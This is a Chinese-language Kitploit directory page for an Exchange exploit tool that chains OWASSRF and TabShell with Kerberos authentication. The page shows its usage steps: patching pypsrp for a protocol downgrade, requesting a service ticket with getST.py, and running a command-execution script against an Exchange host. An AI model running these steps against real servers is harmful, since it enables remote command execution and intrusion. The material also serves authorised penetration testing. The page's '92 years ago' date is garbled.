Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
mobileiron-exploit — 利用易受攻击的 Microsoft Exchange 服务器上的 OWASSRF + TabShell 链,借助 Kerberos 认证执行命令的 Python 脚本。 | Kitploit
工具/GitHubGitHub/synacktiv/mobileiron-exploit
身份验证与授权权限提升漏洞利用Web应用程序漏洞利用渗透测试身份验证
GitHubsynacktiv/mobileiron-exploit

mobileiron-exploit

利用易受攻击的 Microsoft Exchange 服务器上的 OWASSRF + TabShell 链,借助 Kerberos 认证执行命令的 Python 脚本。

查看仓库
92年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

使用 Kerberos 认证的 Tabshell 漏洞利用

  • 改编自 OWASSRF + TabShell 漏洞利用链

  • 首先,对 pyprsp 模块打补丁以启用 WSManStackVersion 降级,并安装依赖项

root@kitploit:~
$ git clone https://github.com/jborean93/pypsrp
$ patch -p0 < pyprsp.patch
patching file pypsrp/src/pypsrp/complex_objects.py
patching file pypsrp/src/pypsrp/powershell.py
patching file pypsrp/src/pypsrp/serializer.py
patching file pypsrp/src/pypsrp/wsman.py

$ virtualenv venv
$ . ./venv/bin/activate
$ pip install ./pypsrp impacket termcolor gssapi krb5
  • 然后,为存在漏洞的 Exchange 请求 HTTP 服务类的服务票据,并将其传递给最终脚本:
root@kitploit:~
$ getST.py -spn HTTP/EXCHANGE.CORP.LOCAL -k -no-pass  'CORP/Admin:Password'
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Getting ST for user
[*] Saving ticket in Administrator.ccache

$ KRB5CCNAME=Admin.ccache  python3 krb_tabshell_exec_cmd.py -spn HTTP/EXCHANGE.CORP.LOCAL -url http://EXCHANGE.CORP.LOCAL -cmd whoami
[...]
下载工具